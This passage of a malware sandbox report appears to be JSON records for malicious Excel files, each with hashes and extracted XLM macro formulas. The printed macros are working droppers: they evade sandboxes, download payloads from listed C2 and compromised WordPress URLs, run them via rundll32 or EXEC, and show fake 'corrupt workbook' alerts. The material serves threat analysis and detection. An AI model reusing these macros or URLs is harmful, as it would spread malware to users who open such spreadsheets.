,CLOSE(TRUE))\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\fef2fff.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"YsxnW7tDj1\",TRUE)\nGOTO(R$0C$19)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"20c3df448172479eba10ee1e1ff8e33d8e1f41c267ebcf3d03d91ef36414faf0"},"analysis":{"reported":"2020-04-09T16:15:17Z","score":10},"files":[{"filename":"20c3df448172479eba10ee1e1ff8e33d8e1f41c267ebcf3d03d91ef36414faf0","filesize":185344,"md5":"0d109e7906fcb98e452a29b1e8055c59","sha1":"67190d7ea102a5e6ec560c156e94f9bee19d983a","sha256":"20c3df448172479eba10ee1e1ff8e33d8e1f41c267ebcf3d03d91ef36414faf0","sha512":"8827c9bcdc2532d6acddecf37c830f6a7f67c3acdb318b421fca9774ab40eb35ed22afb548f05048263dcb5d0515ad5cece106d1d39f94bc6d49842aa5153fcc","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"20c3df448172479eba10ee1e1ff8e33d8e1f41c267ebcf3d03d91ef36414faf0.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Microsoft Office Webquery","c2":["https://veqejzkb.xyz/SDVe2f2fds"]}},{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"IF(ALERT(\"We found a problem with some content. Do you want to try to recover as much as we can?\",1),,CLOSE(TRUE))\nIF(GET.WORKSPACE(19),,CLOSE(TRUE))\nIF(GET.WORKSPACE(42),,CLOSE(TRUE))\nRETURN()\nRETURN()\nRETURN()"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"20d3858d68d49bba6a94c8acad8936287174269fa403d1cf2927298e7318fb35"},"analysis":{"reported":"2020-04-09T16:15:17Z","score":10},"files":[{"filename":"20d3858d68d49bba6a94c8acad8936287174269fa403d1cf2927298e7318fb35","filesize":167936,"md5":"aba59f24009d58fb1697124224424583","sha1":"91d37045a8640c1f3dd9ad8dfce46da65a3963ea","sha256":"20d3858d68d49bba6a94c8acad8936287174269fa403d1cf2927298e7318fb35","sha512":"448399e0b09637fa0abe042b14b4908cbf405f7b62fa06885b9a9be5f6bb6b87a2cf50ba0361f9d40c52f6ed1a1bfd9b3f54615b88a942f3fcc4efb6a5619465","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"20d3858d68d49bba6a94c8acad8936287174269fa403d1cf2927298e7318fb35.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"=IF(GET.WORKSPACE(14)\u003c381, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\gef3fff.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"wELUGpLfXB\",TRUE)\nGOTO(R$0C$19)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"20d52fbc1e88f54ff18e0d586725112b805b53d327902595bba56f8a4828cea2"},"analysis":{"reported":"2020-04-09T16:15:17Z","score":10},"files":[{"filename":"20d52fbc1e88f54ff18e0d586725112b805b53d327902595bba56f8a4828cea2","filesize":116224,"md5":"e02cbf2c6ffcd087b1a366a2877bac7f","sha1":"993b307c1c06dac9af0f059846cf1c9b3eba31e0","sha256":"20d52fbc1e88f54ff18e0d586725112b805b53d327902595bba56f8a4828cea2","sha512":"5e7c02791ae212cd34dfb114d304d75145c06d920d6c4170743f611342950ab5898087d0a7dc7bf388bd668fa83808da07378119f6604bf1c0c726e2a7344a3b","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"20d52fbc1e88f54ff18e0d586725112b805b53d327902595bba56f8a4828cea2.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["https://pxdgcvnsb.xyz/aaeg4df12"],"attr":{"formulas":"=IF(GET.WORKSPACE(13)\u003c770, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(14)\u003c381, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://pxdgcvnsb.xyz/aaeg4df12\",\"c:\\Users\\Public\\cwep5ef.html\",0,0)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\cwep5ef.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"RDnKLzvVm9\",TRUE)\nGOTO(R$1C$10)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"20e2344e9aa8d983948dec1d657ff75df7607c482d972ee3438b1ffac7cde33c"},"analysis":{"reported":"2020-04-09T16:15:17Z","score":10},"files":[{"filename":"20e2344e9aa8d983948dec1d657ff75df7607c482d972ee3438b1ffac7cde33c","filesize":185344,"md5":"c157891f7194aa03819462e4fe9744af","sha1":"38c1de49141c8241ea5400f33615288b5f13ac82","sha256":"20e2344e9aa8d983948dec1d657ff75df7607c482d972ee3438b1ffac7cde33c","sha512":"b2ae8b156eaf03965c94761e23c230817b893d3c4146b700f665626fbc6891409ea9bc55c68ade1bc317a7192789804213da41b7c6aa30532f53bf1b5d71eef4","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"20e2344e9aa8d983948dec1d657ff75df7607c482d972ee3438b1ffac7cde33c.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Microsoft Office Webquery","c2":["https://emmnebuc.xyz/SDVJKBsdkhv1"]}},{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"IF(ALERT(\"We found a problem with some content. Do you want to try to recover as much as we can?\",1),,CLOSE(TRUE))\nIF(GET.WORKSPACE(19),,CLOSE(TRUE))\nIF(GET.WORKSPACE(42),,CLOSE(TRUE))\nRETURN()\nRETURN()\nRETURN()"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"20e411c1a4844153c6515ff9295b4a93f81fca4a57731584901d13aeb1712009"},"analysis":{"reported":"2020-04-09T16:15:17Z","score":10},"files":[{"filename":"20e411c1a4844153c6515ff9295b4a93f81fca4a57731584901d13aeb1712009","filesize":112128,"md5":"e8898ceaa1cab8b0e5ec39faff6a569b","sha1":"19f9b877e8f768f33596b24b97613f32b9e31e9b","sha256":"20e411c1a4844153c6515ff9295b4a93f81fca4a57731584901d13aeb1712009","sha512":"33addad419d4cd1519867062cf591a863d6a028d7377af1fe0449cadf9745b8c2ce61eecae16c9f31c7ba3cf518e848ac4e8321b951052b954c7bea0e28b66be","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"20e411c1a4844153c6515ff9295b4a93f81fca4a57731584901d13aeb1712009.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Microsoft Office Webquery","c2":["https://tozcftdl.xyz/SDVjkhb7831r"]}},{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"RETURN()\nRETURN()\nIF(GET.WORKSPACE(19),,CLOSE(TRUE))\nIF(GET.WORKSPACE(42),,CLOSE(TRUE))\nRETURN()"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"2108ceda2c1aa9985151f09cfd92d2350b621b66f599a05c5b412144977f1f5e"},"analysis":{"reported":"2020-04-09T16:15:17Z","score":10},"files":[{"filename":"2108ceda2c1aa9985151f09cfd92d2350b621b66f599a05c5b412144977f1f5e","filesize":185344,"md5":"4909e7c6480ca119588ebac8d05fe3cf","sha1":"21502d044d61166fcbbd86675635788e98e9029c","sha256":"2108ceda2c1aa9985151f09cfd92d2350b621b66f599a05c5b412144977f1f5e","sha512":"41141002a7232cbb28e353749f5c1bb0dcc85ee5f9723e56b118ae4d4f3388e521baf9829aa6f2d8640f0887af489361010201ca3c0ade134635f55a1331aee4","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"2108ceda2c1aa9985151f09cfd92d2350b621b66f599a05c5b412144977f1f5e.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Microsoft Office Webquery","c2":["https://veqejzkb.xyz/SDVe2f2fds"]}},{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"IF(ALERT(\"We found a problem with some content. Do you want to try to recover as much as we can?\",1),,CLOSE(TRUE))\nIF(GET.WORKSPACE(19),,CLOSE(TRUE))\nIF(GET.WORKSPACE(42),,CLOSE(TRUE))\nRETURN()\nRETURN()\nRETURN()"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"2117d6b9b9170a06d9d15617a58e652d7d73e40432e1c8a031202a2571ecea42"},"analysis":{"reported":"2020-04-09T16:15:17Z","score":10},"files":[{"filename":"2117d6b9b9170a06d9d15617a58e652d7d73e40432e1c8a031202a2571ecea42","filesize":185344,"md5":"a8b9f3b1dceca41472f062b9e83ac5f3","sha1":"9f8f996a3ace4e7ce6f76e6101ce2ab8664731f8","sha256":"2117d6b9b9170a06d9d15617a58e652d7d73e40432e1c8a031202a2571ecea42","sha512":"58d7f5ca70296a335266d5932cd2279cec3cfa997344cb07caf32f88ee27439f4e593067fbb46376d7bb753c6288d65a57b8d19c85dcd606d41d2857fddce7d4","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"2117d6b9b9170a06d9d15617a58e652d7d73e40432e1c8a031202a2571ecea42.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Microsoft Office Webquery","c2":["https://doolised.xyz/DSBVhsdv78f"]}},{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"IF(ALERT(\"We found a problem with some content. Do you want to try to recover as much as we can?\",1),,CLOSE(TRUE))\nIF(GET.WORKSPACE(19),,CLOSE(TRUE))\nIF(GET.WORKSPACE(42),,CLOSE(TRUE))\nRETURN()\nRETURN()\nRETURN()"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"2117ff061bca1c6459295bb486c0cadde9151ac071664ddffd570bd04c92ec0a"},"analysis":{"reported":"2020-04-09T16:15:17Z","score":10},"files":[{"filename":"2117ff061bca1c6459295bb486c0cadde9151ac071664ddffd570bd04c92ec0a","filesize":152576,"md5":"7ec82a9fff5a9e936c26f1188a149585","sha1":"14952006a3043e4a44de9f8d5e51ba6090404869","sha256":"2117ff061bca1c6459295bb486c0cadde9151ac071664ddffd570bd04c92ec0a","sha512":"d1e6361858b918aaddd64bd3541a03ce69a0b227b83394a3beda3745577d93e492b788014231a5a88bb5ea57d065b416ea742fef6ad55c6f00a662856b08bacb","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"2117ff061bca1c6459295bb486c0cadde9151ac071664ddffd570bd04c92ec0a.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["https://fbknuele.pw/ajt1eg4fh3a"],"attr":{"formulas":"=IF(GET.WORKSPACE(13)\u003c770, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(14)\u003c381, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://fbknuele.pw/ajt1eg4fh3a\",\"c:\\Users\\Public\\awefwef.html\",0,0)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\awefwef.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"9ysTCZSwPo\",TRUE)\nGOTO(R$1C$10)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"2123509721bed98a1cde16d7abfc73ce67e6587812dded84b474419cd4f0fa68"},"analysis":{"reported":"2020-04-09T16:15:17Z","score":10},"files":[{"filename":"2123509721bed98a1cde16d7abfc73ce67e6587812dded84b474419cd4f0fa68","filesize":113664,"md5":"8dd4070acf4e369fdf1bd0ad2cdf9ffd","sha1":"3a3063efc2ec25bc4f41ea824428b98a3f678216","sha256":"2123509721bed98a1cde16d7abfc73ce67e6587812dded84b474419cd4f0fa68","sha512":"3f27181ddf38761aad1b87567305913d2c9da287fd3f2001f62135106598da1a682a7ffa5e3b5ac2480f5b06199b1118c581c4d5940885a13a11a2fbc3c5a9e9","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"2123509721bed98a1cde16d7abfc73ce67e6587812dded84b474419cd4f0fa68.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["http://murreeweather.com/wp-content/white/444444.png","http://batilservice.xyz/wp-content/uploads/2020/02/white/444444.png","http://tubolso.cl/wp-content/uploads/2020/02/white/444444.png","http://freespacemarketing.com/wp-content/uploads/2020/02/white/444444.png"],"attr":{"formulas":"IF(GET.WORKSPACE(42),,CLOSE(TRUE))\nGET.WORKSPACE(13)\nGET.WORKSPACE(14)\nIF(R$1C$0\u003c770,CLOSE(FALSE),)\nIF(R$2C$0\u003c380,CLOSE(FALSE),)\nIF(GET.WORKSPACE(19),,CLOSE(TRUE))\nCALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"http://murreeweather.com/wp-content/white/444444.png\",\"c:\\Users\\Public\\jkqnrlvkrq.exe\",0,0)\nIF(R$6C$0\u003c0,CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"http://batilservice.xyz/wp-content/uploads/2020/02/white/444444.png\",\"c:\\Users\\Public\\jkqnrlvkrq.exe\",0,0),GOTO(ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it is corrupt.\",2)))\nIF(R$7C$0\u003c0,CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"http://tubolso.cl/wp-content/uploads/2020/02/white/444444.png\",\"c:\\Users\\Public\\jkqnrlvkrq.exe\",0,0),GOTO(ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it is corrupt.\",2)))\nIF(R$8C$0\u003c0,CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"http://freespacemarketing.com/wp-content/uploads/2020/02/white/444444.png\",\"c:\\Users\\Public\\jkqnrlvkrq.exe\",0,0),GOTO(ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it is corrupt.\",2)))\nIF(R$9C$0\u003c0,CLOSE(FALSE),)\nALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it is corrupt.\",2)\nEXEC(\"c:\\Users\\Public\\jkqnrlvkrq.exe\")\nCLOSE(FALSE)\nRETURN()\nWORKBOOK.HIDE(\"iNJPAtlU4o\",TRUE)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"212c7034c2206f67459cd19f8b17814f10fbc787e8188d7e82a251eecd01ac6b"},"analysis":{"reported":"2020-04-09T16:15:17Z","score":10},"files":[{"filename":"212c7034c2206f67459cd19f8b17814f10fbc787e8188d7e82a251eecd01ac6b","filesize":185344,"md5":"008ea4306d99201d589439ce3d33b333","sha1":"23ccb551d6c34c2ea2815b7714abe382108cd30d","sha256":"212c7034c2206f67459cd19f8b17814f10fbc787e8188d7e82a251eecd01ac6b","sha512":"f7d995136dcea52035bf7fda5433da45cbe8dd89301be077c45927471aafb973e49479d4e507b5cf48074ee49d0bf9ee1144640bd3f96e65ae49fc23fd3b6063","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"212c7034c2206f67459cd19f8b17814f10fbc787e8188d7e82a251eecd01ac6b.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Microsoft Office Webquery","c2":["https://merystol.xyz/6ng688x8"]}},{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"IF(ALERT(\"We found a problem with some content. Do you want to try to recover as much as we can?\",1),,CLOSE(TRUE))\nIF(GET.WORKSPACE(19),,CLOSE(TRUE))\nIF(GET.WORKSPACE(42),,CLOSE(TRUE))\nRETURN()\nRETURN()\nRETURN()"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"212f57f398129128bbef5f2e0a4465eca0ba99f301373df1c9c7b470a228b8be"},"analysis":{"reported":"2020-04-09T16:15:17Z","score":10},"files":[{"filename":"212f57f398129128bbef5f2e0a4465eca0ba99f301373df1c9c7b470a228b8be","filesize":113664,"md5":"fb180c8666a1f51cbec21aaf997ac058","sha1":"7e3613239bd34d88cadbc8f2e3b3825b1a465c30","sha256":"212f57f398129128bbef5f2e0a4465eca0ba99f301373df1c9c7b470a228b8be","sha512":"bb7c211b29534793e2532ded6e04fff04d2f5aba1f2d69783633d02699dc8e1b4469ec7ef375a782e61e7405d6ad3b2758b445c52ac5f3b38f004f5c1b861338","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"212f57f398129128bbef5f2e0a4465eca0ba99f301373df1c9c7b470a228b8be.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["http://murreeweather.com/wp-content/white/444444.png","http://batilservice.xyz/wp-content/uploads/2020/02/white/444444.png","http://tubolso.cl/wp-content/uploads/2020/02/white/444444.png","http://freespacemarketing.com/wp-content/uploads/2020/02/white/444444.png"],"attr":{"formulas":"IF(GET.WORKSPACE(42),,CLOSE(TRUE))\nGET.WORKSPACE(13)\nGET.WORKSPACE(14)\nIF(R$1C$0\u003c770,CLOSE(FALSE),)\nIF(R$2C$0\u003c380,CLOSE(FALSE),)\nIF(GET.WORKSPACE(19),,CLOSE(TRUE))\nCALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"http://murreeweather.com/wp-content/white/444444.png\",\"c:\\Users\\Public\\jkqnrlvkrq.exe\",0,0)\nIF(R$6C$0\u003c0,CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"http://batilservice.xyz/wp-content/uploads/2020/02/white/444444.png\",\"c:\\Users\\Public\\jkqnrlvkrq.exe\",0,0),GOTO(ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it is corrupt.\",2)))\nIF(R$7C$0\u003c0,CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"http://tubolso.cl/wp-content/uploads/2020/02/white/444444.png\",\"c:\\Users\\Public\\jkqnrlvkrq.exe\",0,0),GOTO(ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it is corrupt.\",2)))\nIF(R$8C$0\u003c0,CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"http://freespacemarketing.com/wp-content/uploads/2020/02/white/444444.png\",\"c:\\Users\\Public\\jkqnrlvkrq.exe\",0,0),GOTO(ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it is corrupt.\",2)))\nIF(R$9C$0\u003c0,CLOSE(FALSE),)\nALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it is corrupt.\",2)\nEXEC(\"c:\\Users\\Public\\jkqnrlvkrq.exe\")\nCLOSE(FALSE)\nRETURN()\nWORKBOOK.HIDE(\"ndoq0DhGBU\",TRUE)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"21473c9a6d3cc9d99b365ca4e00481e3378533236b970d711c403bbb475d5716"},"analysis":{"reported":"2020-04-09T16:15:17Z","score":10},"files":[{"filename":"21473c9a6d3cc9d99b365ca4e00481e3378533236b970d711c403bbb475d5716","filesize":170496,"md5":"d4d9e8545736b3dad5da0533efa756ac","sha1":"f2ad5d3a69fcd54b323973880bdf7cbcd7b27273","sha256":"21473c9a6d3cc9d99b365ca4e00481e3378533236b970d711c403bbb475d5716","sha512":"d28ebdc92c92b22b29b4dabad954ef2417f69339fcb3217ab655f718c721e0b5a2760ee52dc85d188c6afaacd9600f6f98a45b18d43f5f61ada492d7df90fc36","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"21473c9a6d3cc9d99b365ca4e00481e3378533236b970d711c403bbb475d5716.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"=IF(GET.WORKSPACE(14)\u003c381, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\fef2fff.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"lXpDmwv2lb\",TRUE)\nGOTO(R$0C$19)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"2164bac7bb5f7cbd46db4608a81b63dd8f7aac4b7e824e8ab9df13bbdfbb6218"},"analysis":{"reported":"2020-04-09T16:15:17Z","score":10},"files":[{"filename":"2164bac7bb5f7cbd46db4608a81b63dd8f7aac4b7e824e8ab9df13bbdfbb6218","filesize":152576,"md5":"26ccfc69f47243c58ff08fe049d2e909","sha1":"50eaa9e6c925877adf394476f8f2ddafc6b64c09","sha256":"2164bac7bb5f7cbd46db4608a81b63dd8f7aac4b7e824e8ab9df13bbdfbb6218","sha512":"0009e4ec2bd6c23d7bc406de4fe3a9481944b2f7dffd75bae3bd944e6558a097a57b9a87d98e0d7b1fbf70b18eb8a818f2ac16967d3385f3a50e6e4934aae792","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"2164bac7bb5f7cbd46db4608a81b63dd8f7aac4b7e824e8ab9df13bbdfbb6218.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["https://fbknuele.pw/ajt1eg4fh3a"],"attr":{"formulas":"=IF(GET.WORKSPACE(13)\u003c770, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(14)\u003c381, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://fbknuele.pw/ajt1eg4fh3a\",\"c:\\Users\\Public\\awefwef.html\",0,0)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\awefwef.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"1qMAOw9bzN\",TRUE)\nGOTO(R$1C$10)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"217965457dff52978df4088b0e2ed9935c8e2a4005ac4aea5cbd52e5c3cf3908"},"analysis":{"reported":"2020-04-09T16:15:17Z","score":10},"files":[{"filename":"217965457dff52978df4088b0e2ed9935c8e2a4005ac4aea5cbd52e5c3cf3908","filesize":112640,"md5":"a5ad637371bb89b7c61261ee51da56f3","sha1":"fd76dbd46ed73618c97a3398f935856a3bd12bd2","sha256":"217965457dff52978df4088b0e2ed9935c8e2a4005ac4aea5cbd52e5c3cf3908","sha512":"1b0219a4e882363faa94f3ee4183f8ae9df215f0e488b49ff84589efd0286bf7dc359cc4d944f1ba7d88afcd7a0572d0d2caabf9b01993a3a07b7494c7ee34e9","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"217965457dff52978df4088b0e2ed9935c8e2a4005ac4aea5cbd52e5c3cf3908.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Microsoft Office Webquery","c2":["https://pnxkntdl.xyz/KDSBVksdhv778a"]}},{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"IF(GET.WORKSPACE(42),,CLOSE(TRUE))\nRETURN()\nRETURN()\nRETURN()"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"217a331788e2ae8b90d562d5b613358bcd5f1ff0d778a79becfa66930f87e5f2"},"analysis":{"reported":"2020-04-09T16:15:17Z","score":10},"files":[{"filename":"217a331788e2ae8b90d562d5b613358bcd5f1ff0d778a79becfa66930f87e5f2","filesize":206336,"md5":"c50adb79063d2a8b267542e3371437cf","sha1":"e89d16b099d9530952f1b5d76bd92ba169ea5b54","sha256":"217a331788e2ae8b90d562d5b613358bcd5f1ff0d778a79becfa66930f87e5f2","sha512":"8ec2e3e3a10b7acb14051567c18887cefc4559e4bdf3e0287218444c9c9cfe203bd3c4d65e23967c2c1ef84a31859d5b3dc6bfba628111b0134d0407525baafe","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"217a331788e2ae8b90d562d5b613358bcd5f1ff0d778a79becfa66930f87e5f2.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["https://rwtkoaqe.club/adfbr53g"],"attr":{"formulas":"=IF(GET.WORKSPACE(13)\u003c770, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(14)\u003c400, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\reg.exe\",\"EXPORT HKCU\\Software\\Microsoft\\Office\\\"\u0026GET.WORKSPACE(2)\u0026\"\\Excel\\Security c:\\users\\public\\1.reg /y\",0,5)\n=WAIT(NOW()+\"00:00:03\")\n=FOPEN(\"c:\\users\\public\\1.reg\")\n=FPOS(R[-1]C, 215)\n=FREAD(R[-2]C, 255)\n=FCLOSE(R[-3]C)\n=FILE.DELETE(\"c:\\users\\public\\1.reg\")\n=IF(ISNUMBER(SEARCH(\"0001\",R[-3]C)),CLOSE(FALSE),)\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://rwtkoaqe.club/adfbr53g\",\"c:\\Users\\Public\\bug65eh.html\",0,0)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\bug65eh.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"8ex3z0sW9M\",TRUE)\nGOTO(R$0C$18)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"218cff5889adbaafd2a0434db208436103de7fff7d255b59541bbe60e050f1dd"},"analysis":{"reported":"2020-04-09T16:15:17Z","score":10},"files":[{"filename":"218cff5889adbaafd2a0434db208436103de7fff7d255b59541bbe60e050f1dd","filesize":168960,"md5":"c4e0bc2bd297885c420e06fa4e85b4e3","sha1":"3ddbeb6d0747cc0a70a13596f7920e71fbbf519c","sha256":"218cff5889adbaafd2a0434db208436103de7fff7d255b59541bbe60e050f1dd","sha512":"2aeae588bcc1fe8a17974e4173cc308525c724c8e31d92ca2f8af088d66be1a4b3557e573884014ff367ca57f34af05c1d704f09db94741c254aad8ed38330c1","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"218cff5889adbaafd2a0434db208436103de7fff7d255b59541bbe60e050f1dd.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"=IF(GET.WORKSPACE(13)\u003c770, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(14)\u003c381, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), 